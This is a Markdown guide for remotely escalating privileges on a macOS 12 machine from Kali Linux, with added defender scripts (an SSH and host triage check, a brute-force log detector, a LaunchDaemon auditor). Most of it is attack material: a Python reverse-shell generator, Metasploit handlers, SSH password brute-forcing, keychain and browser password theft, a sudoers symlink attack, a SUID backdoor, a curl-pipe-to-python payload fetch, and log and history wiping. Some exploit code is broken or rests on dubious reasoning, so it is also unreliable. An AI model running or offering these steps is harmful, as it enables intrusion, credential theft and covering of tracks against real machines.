# macOS Remote Privilege Escalation Technical Documentation

## Technical Overview

AppleDataHarvester is used together with mnist: the harvester performs the monitoring and collects web and system information. A hand-written mnist container for refining that data is planned for a later stage; what exists now is sufficient. The collected data is then called remotely with commands run from Kali, and privileges are obtained from there.

Target: macOS 12-16
Note: not tested on the latest Macs; my laptop is one of the oldest models.

Environment setup: macOS Monterey 12.6.7 (other environments should also work)
Target system: macOS Monterey 12.6.7

## Detailed Steps
1. Enter the project directory:

   ```bash
   cd GetRoot && cd AppleDataHarvester
   ```

2. Launch the monitoring script:

   ```bash
   python3 harvester.py
   ```

3. Log generation: the detailed logs are written to the `output` directory.

4. AI-generated privilege escalation code for Kali. Below is my own privilege escalation code and procedure for Kali (my example):

### System Information Analysis
```text
System:     macOS 12.7.6 (Intel i7-4870HQ, 16GB RAM)
Uptime:     11,915,332 seconds (~138 days without reboot)   ← Critical finding!
User:       apophis
Network:    en0 192.168.0.100/24
Disk usage: / partition 91% (near capacity)
```

### 🔴 Critical Vulnerability Analysis

1. Extended uptime (138 days) - highest risk

   ```text
   uptime_seconds: 11915332   # approximately 138 days
   Risk: unpatched kernel vulnerabilities; memory layout made predictable by long-lived memory leaks
   ```

2. Disk usage at 91% - moderate risk

   ```text
   use_percent: 91%   # near capacity
   Risk: log rotation failures, abnormal temporary-file cleanup
   ```

3. macOS 12.7.6 - known vulnerabilities
   - CVE-2023-32434 (kernel privilege escalation)
   - CVE-2023-32439 (Safari RCE)

## 🛡️ Privilege Escalation Schemes in Kali
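Before the schemes, here is the defender's counterpart to the three findings above: an added triage script that is not part of the GetRoot/AppleDataHarvester project. It takes the same facts the harvester reports (uptime in seconds, disk use percentage, OS version) plus the contents of `/etc/ssh/sshd_config`, and emits a finding with a concrete fix for each. The thresholds (`MAX_UPTIME_DAYS`, `DISK_WARN_PERCENT`, `OLDEST_SUPPORTED_MAJOR`), the function names and the sample `sshd_config` are all my assumptions; the one real detail it relies on is that sshd applies the first value it sees for a keyword, so a later `PasswordAuthentication no` does not undo an earlier `yes`.

```python
"""Defender-side triage of harvester output (added example, not project code).
Thresholds and sample inputs are constructed."""
import re
from dataclasses import dataclass

# Constructed thresholds (assumptions, not values from the page).
MAX_UPTIME_DAYS = 30          # longer than this and installed kernel updates have never been booted
DISK_WARN_PERCENT = 85        # log rotation and temp-file cleanup degrade near a full volume
OLDEST_SUPPORTED_MAJOR = 13   # assumption: treat macOS 12 and older as out of security support

# OpenSSH defaults for keywords absent from sshd_config, and the values we flag.
SSHD_DEFAULTS = {"permitrootlogin": "prohibit-password", "passwordauthentication": "yes"}
SSHD_WEAK = {"permitrootlogin": {"yes"}, "passwordauthentication": {"yes"}}
SSHD_CANONICAL = {"permitrootlogin": "PermitRootLogin", "passwordauthentication": "PasswordAuthentication"}


@dataclass
class Finding:
    code: str
    severity: str
    detail: str
    fix: str


def effective_sshd_options(config_text: str) -> dict:
    """Keyword -> value as sshd applies it. sshd_config(5): the first obtained
    value for a keyword wins, so later duplicates are ignored."""
    opts = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # "Key value" or "Key=value"
        if len(parts) == 2:
            opts.setdefault(parts[0].lower(), parts[1].strip().lower())
    return opts


def audit_host(uptime_seconds: int, use_percent: int, os_version: str,
               sshd_config: str) -> list:
    """Score the facts the harvester reports and say what to fix for each."""
    findings = []
    days = uptime_seconds / 86400
    if days > MAX_UPTIME_DAYS:
        findings.append(Finding("UPTIME", "high", f"up for {days:.0f} days",
                                "install pending updates and reboot so the patched kernel is the one running"))
    if use_percent >= DISK_WARN_PERCENT:
        findings.append(Finding("DISK", "medium", f"root volume {use_percent}% full",
                                "free space, then confirm newsyslog rotation and unified logging still write"))
    if int(os_version.split(".")[0]) < OLDEST_SUPPORTED_MAJOR:
        findings.append(Finding("OS_UNSUPPORTED", "high", f"macOS {os_version}",
                                "upgrade to a supported release so future kernel fixes still arrive"))
    opts = effective_sshd_options(sshd_config)
    for key, weak_values in SSHD_WEAK.items():
        value = opts.get(key, SSHD_DEFAULTS[key])
        if value in weak_values:
            name = SSHD_CANONICAL[key]
            findings.append(Finding("SSH_" + key.upper(), "high", f"{name} {value}",
                                    f"set '{name} no' in /etc/ssh/sshd_config and restart sshd"))
    return findings


# Constructed sample: the figures from the page plus an sshd_config that tries to
# re-disable password auth on a later line (which sshd ignores).
SAMPLE_SSHD_CONFIG = """
PermitRootLogin yes
PasswordAuthentication yes
UsePAM yes
PasswordAuthentication no   # ignored: the first value wins
"""

if __name__ == "__main__":
    for f in audit_host(11915332, 91, "12.7.6", SAMPLE_SSHD_CONFIG):
        print(f"[{f.severity:<6}] {f.code:<26} {f.detail:<28} fix: {f.fix}")
```

Run against the page's own numbers it reports all five findings; the same check on a rebooted, patched host with key-only SSH returns an empty list, which is the state a defender wants the harvester to see.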
### Scheme 1: Exploiting Kernel Vulnerabilities Due to Extended Uptime
```python
#!/usr/bin/env python3
import socket
import struct
import time


class MacOSKernelExploit:
    def __init__(self, target_ip="192.168.0.100"):
        self.target = target_ip
        self.port = 22  # Assuming SSH is enabled

    def check_vulnerability(self):
        """Check if target is susceptible to UAF attacks"""
        # Note: nothing is sent to self.target here; the method only prints the
        # CVE list inferred from the harvester output and returns True.
        print("[*] Checking target system status...")
        # Systems with long uptime are more susceptible to triggering UAF
        print("[+] Target has been running for 138 days, memory layout highly predictable")
        print("[+] Potentially affected by the following vulnerabilities:")
        print("    - CVE-2022-32894 (Kernel Out-of-Bounds Write)")
        print("    - CVE-2023-32434 (XNU UAF)")
        return True

    def exploit_cve_2023_32434(self):
        """Exploit CVE-2023-32434 - XNU Kernel UAF"""
        print("\n[*] Attempting to exploit CVE-2023-32434...")
        # Vulnerability Principle: Trigger UAF via Mach port race condition
        # The shell snippet is only returned as a string; this script neither
        # transfers nor runs it.
        exploit_payload = """
# 1. Create numerous Mach ports to induce memory pressure
for i in {1..10000}; do
    python3 -c "import ctypes; ctypes.CDLL('libSystem.B.dylib').mach_port_allocate()" &
done
# 2. Trigger race condition
while true; do
    sysctl -w kern.maxproc=10000 2>/dev/null
    sysctl -w kern.maxprocperuid=10000 2>/dev/null
done
"""
        return exploit_payload

    def generate_reverse_shell(self, lhost, lport):
        """Generate reverse shell payload"""
        shellcode = f"""
python3 -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("{lhost}",{lport}));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
subprocess.call(["/bin/bash","-i"])'
"""
        return shellcode


def setup_kali_listener():
    print("""
╔══════════════════════════════════════════════════════╗
║           macOS Privilege Escalation Guide           ║
║                   Kali Linux Side                    ║
╚══════════════════════════════════════════════════════╝
""")
    print("[1] Start Metasploit Listener:")
    print("""
    msfconsole -q
    use exploit/multi/handler
    set PAYLOAD osx/x64/meterpreter_reverse_tcp
    set LHOST <Your_Kali_IP>
    set LPORT 4444
    exploit -j
    """)
    print("\n[2] Start Netcat Listener:")
    print("    nc -lvnp 4444")
    print("\n[3] Start HTTP Server (for exploit transfer):")
    print("    python3 -m http.server 8000")


if __name__ == "__main__":
    setup_kali_listener()
```

### Scheme 2: Credential Harvesting via SSH
```bash
#!/bin/bash
TARGET="192.168.0.100"
USER="apophis"

echo "[*] macOS Credential Harvesting Scheme"
echo "================================"

echo "[1] Checking SSH weak configurations..."
ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 $USER@$TARGET "cat /etc/ssh/sshd_config | grep -E 'PermitRootLogin|PasswordAuthentication|UsePAM'" 2>/dev/null

echo -e "\n[2] Sudo Cache Exploitation..."
ssh $USER@$TARGET "sudo -k; echo 'password' | sudo -S -v 2>/dev/null && sudo -l" 2>/dev/null

echo -e "\n[3] Extracting WiFi Credentials..."
ssh $USER@$TARGET "security find-generic-password -wa 'com.apple.network.eap.user.item.wlan.ssid'" 2>/dev/null

echo -e "\n[4] Extracting Chrome Passwords..."
ssh $USER@$TARGET "security find-internet-password -s 'accounts.google.com' -w" 2>/dev/null

echo -e "\n[5] Checking Sensitive Temporary Files..."
ssh $USER@$TARGET "find /tmp /var/tmp -name '*.key' -o -name 'password' -o -name 'secret' 2>/dev/null | head -20"
```

### Scheme 3: Triggering Permission Vulnerabilities via Disk Full Conditions
```python
#!/usr/bin/env python3
import paramiko
import time


class DiskPressureExploit:
    """
    When disk usage reaches 91%:
    1. System log writes may fail, leading to security event loss
    2. Temporary file cleanup cron tasks may behave abnormally
    3. Certain setuid programs may encounter race conditions
    """

    def __init__(self, target, username, password=None):
        self.target = target
        self.username = username
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        # Note: `password` is never stored and connect() is never called, so the
        # exec_command() calls below raise before anything is sent.

    def exploit_log_rotation(self):
        """Exploit log rotation failures"""
        print("[*] Triggering log rotation vulnerability...")
        commands = [
            # 1. Fill up log directory
            "dd if=/dev/zero of=/var/log/test.log bs=1M count=100 2>/dev/null",
            # 2. Trigger newsyslog race condition
            "while true; do newsyslog -F & done",
            # 3. Symlink attack
            "ln -sf /etc/sudoers /var/log/system.log 2>/dev/null",
            # 4. Wait for system to write to sudoers
            "sleep 30",
            # 5. Check if modification was successful
            "cat /etc/sudoers | grep 'ALL=(ALL) NOPASSWD:ALL'",
        ]
        for cmd in commands:
            stdin, stdout, stderr = self.ssh.exec_command(cmd)
            print(stdout.read().decode())

    def create_suid_backdoor(self):
        """Create SUID backdoor"""
        print("[*] Attempting to create SUID backdoor...")
        # Exploit potentially writable binary files in long-running systems
        backdoor = """
echo '#!/bin/bash' > /tmp/.backdoor
echo 'cp /bin/bash /tmp/.bash' >> /tmp/.backdoor
echo 'chmod 4755 /tmp/.bash' >> /tmp/.backdoor
chmod +x /tmp/.backdoor
# Find writable cron tasks
find /etc/cron* -type f -writable 2>/dev/null
find /Library/LaunchDaemons -type f -writable 2>/dev/null
"""
        stdin, stdout, stderr = self.ssh.exec_command(backdoor)
        return stdout.read().decode()
```
### Scheme 4: Automated Metasploit Attack
```ruby
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.0.100
set USERNAME apophis
set PASSWORD_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
run

use exploit/multi/handler
set PAYLOAD osx/x64/meterpreter_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit -j
```
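The `ssh_login` step above is the loudest part of the whole chain: every guess from `rockyou.txt` is an `sshd` "Failed password" record on the Mac. As an added detection example (not part of the GetRoot project), the script below runs a sliding-window count of failures per source over sshd log lines and raises a second, higher-priority alert when a source that crossed the threshold then logs in. The log lines are constructed in a syslog-style layout (the `Failed password for ...` / `Accepted ... for ...` message texts are OpenSSH's own wording); `THRESHOLD`, `WINDOW` and the function names are my assumptions. On macOS the real lines come from `log show --predicate 'process == "sshd"'`, and the matching hardening is the `PasswordAuthentication no` from the previous scheme, which turns this whole step into nothing but noise.

```python
"""SSH password-guessing detector (added example, not project code).
Sample log lines are constructed."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+")
OK_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \S+ sshd\[\d+\]: Accepted (?:password|publickey) for "
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+")

THRESHOLD = 5                   # failures from one source ...
WINDOW = timedelta(seconds=60)  # ... inside this sliding window -> alert


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def detect_ssh_bruteforce(lines):
    """Return (kind, src, user, time) tuples. BRUTE_FORCE fires once per source
    when it crosses THRESHOLD; BRUTE_FORCE_SUCCESS fires if that source later
    logs in, which is the alert worth paging on."""
    failures = defaultdict(deque)  # src -> failure timestamps inside WINDOW
    flagged = set()
    alerts = []
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            src, ts = m["src"], _ts(m["ts"])
            q = failures[src]
            q.append(ts)
            while ts - q[0] > WINDOW:   # evict failures older than the window
                q.popleft()
            if len(q) >= THRESHOLD and src not in flagged:
                flagged.add(src)
                alerts.append(("BRUTE_FORCE", src, m["user"], ts))
            continue
        m = OK_RE.match(line)
        if m and m["src"] in flagged:
            alerts.append(("BRUTE_FORCE_SUCCESS", m["src"], m["user"], _ts(m["ts"])))
    return alerts


# Constructed sample log: one source guessing the account from the page, one
# benign typo from another host, one normal key-based login.
SAMPLE_LOG = """\
2024-08-01 10:00:00 mac-mini sshd[4312]: Failed password for apophis from 192.168.0.50 port 51234 ssh2
2024-08-01 10:00:01 mac-mini sshd[4313]: Failed password for apophis from 192.168.0.50 port 51235 ssh2
2024-08-01 10:00:01 mac-mini sshd[4320]: Failed password for apophis from 192.168.0.77 port 60001 ssh2
2024-08-01 10:00:02 mac-mini sshd[4314]: Failed password for apophis from 192.168.0.50 port 51236 ssh2
2024-08-01 10:00:03 mac-mini sshd[4315]: Failed password for invalid user admin from 192.168.0.50 port 51237 ssh2
2024-08-01 10:00:04 mac-mini sshd[4316]: Failed password for apophis from 192.168.0.50 port 51238 ssh2
2024-08-01 10:00:05 mac-mini sshd[4321]: Accepted publickey for apophis from 192.168.0.20 port 40000 ssh2
2024-08-01 10:00:07 mac-mini sshd[4317]: Accepted password for apophis from 192.168.0.50 port 51240 ssh2
"""

if __name__ == "__main__":
    for kind, src, user, when in detect_ssh_bruteforce(SAMPLE_LOG.splitlines()):
        print(f"{when}  {kind:<20} src={src} user={user}")
```

The single failure from 192.168.0.77 and the key-based login from 192.168.0.20 produce nothing; the fifth failure from 192.168.0.50 raises `BRUTE_FORCE`, and the password login that follows raises `BRUTE_FORCE_SUCCESS`.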
## 🎯 Recommended Attack Chain

Based on the collected data, the following attack chain is recommended:

```text
- Initial Access (SSH weak password / phishing)
        ↓
- Information Gathering (uptime 138 days ← critical)
        ↓
- Privilege Escalation (CVE-2023-32434 kernel UAF)
        ↓
- Credential Theft (keychaindump + browser passwords)
        ↓
- Persistence (LaunchDaemon + hidden user)
```

## 📝 Kali Execution Checklist
```bash
msfconsole -q -r macos_auto_pwn.rc

git clone https://github.com/jakeajames/macos-kernel-exploits
cd macos-kernel-exploits
make
python3 -m http.server 8000

curl http://<KALI_IP>:8000/exploit.py | python3

rm -rf /var/log/system.log.*
history -c
```

## Disclaimer
Statement: currently this only applies to older system versions. Remote control is strictly prohibited, and the author bears no responsibility for any related losses. This is open-source code!
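The last link in the chain above is persistence through a LaunchDaemon, and the checklist's final step deletes rotated `system.log` files, so the plist itself is often the only durable artefact left for a responder. As an added example (not part of the GetRoot project), the function below audits one `/Library/LaunchDaemons` plist the way a host-based check would: it parses the XML with `plistlib`, then flags ownership and mode that launchd would reject, a `com.apple.*` label outside `/System/Library` (Apple's own daemons do not live in `/Library/LaunchDaemons`), program arguments that point into user-writable or hidden paths such as `/tmp/.bash`, and interpreters launched with inline code (`sh -c`, `python3 -c`). The sample plists, the `owner_uid`/`mode` parameters (which would come from `os.stat` in a real sweep) and the issue-code names are my assumptions.

```python
"""LaunchDaemon persistence audit (added example, not project code).
Sample plists are constructed."""
import os
import plistlib
import stat

# Locations a root daemon should never execute from: anyone can drop files there.
USER_WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/",
                          "/Users/", "/Library/Caches/")
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "osascript"}
INLINE_FLAGS = {"-c", "-e"}


def audit_launch_daemon(path: str, plist_bytes: bytes, owner_uid: int = 0,
                        mode: int = 0o644) -> list:
    """Return issue codes for one plist. owner_uid/mode are parameters so the
    check runs on constructed input; a real sweep passes os.stat() values."""
    try:
        pl = plistlib.loads(plist_bytes)
    except Exception:
        return ["UNPARSEABLE"]
    issues = []
    # launchd refuses non-root-owned or group/world-writable daemons, but a file
    # in that state is still an alert: someone put it there.
    if owner_uid != 0:
        issues.append("NOT_ROOT_OWNED")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        issues.append("WRITABLE_BY_OTHERS")
    label = str(pl.get("Label", ""))
    if path.startswith("/Library/LaunchDaemons/") and label.startswith("com.apple."):
        issues.append("LABEL_IMPERSONATES_APPLE")
    argv = [str(a) for a in pl.get("ProgramArguments", [])]
    if "Program" in pl:
        argv.insert(0, str(pl["Program"]))
    if not argv:
        issues.append("NO_PROGRAM")
        return issues
    # Split each argument on whitespace so "/tmp/.bash -i" inside a -c string is seen.
    tokens = [t for arg in argv for t in arg.split()]
    if any(t.startswith(USER_WRITABLE_PREFIXES) for t in tokens):
        issues.append("USER_WRITABLE_PATH")
    if any(os.path.basename(t).startswith(".") and os.path.basename(t) not in (".", "..")
           for t in tokens):
        issues.append("HIDDEN_FILE")
    if os.path.basename(argv[0]) in INTERPRETERS and INLINE_FLAGS & set(argv[1:]):
        issues.append("INLINE_SCRIPT")
    return issues


PLIST_HEAD = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
              b'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
              b'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n<plist version="1.0"><dict>\n')
PLIST_TAIL = b'</dict></plist>\n'

# Constructed: a normal third-party agent.
BENIGN = PLIST_HEAD + b"""
<key>Label</key><string>com.example.backupagent</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/backupagent</string><string>--daemon</string></array>
<key>RunAtLoad</key><true/>
""" + PLIST_TAIL

# Constructed: the shape of the persistence step from the chain above.
SUSPECT = PLIST_HEAD + b"""
<key>Label</key><string>com.apple.softwareupdate.helper</string>
<key>ProgramArguments</key><array><string>/bin/bash</string><string>-c</string><string>/tmp/.bash -i</string></array>
<key>RunAtLoad</key><true/>
<key>KeepAlive</key><true/>
""" + PLIST_TAIL

if __name__ == "__main__":
    print(audit_launch_daemon("/Library/LaunchDaemons/com.example.backupagent.plist", BENIGN))
    print(audit_launch_daemon("/Library/LaunchDaemons/com.apple.softwareupdate.helper.plist",
                              SUSPECT, owner_uid=501, mode=0o666))
```

Any non-empty result is worth a look; `LABEL_IMPERSONATES_APPLE` together with `USER_WRITABLE_PATH` is close to a certain finding, and the plist should be preserved before it is unloaded, since it is the evidence the `rm -rf /var/log/system.log.*` step was meant to remove.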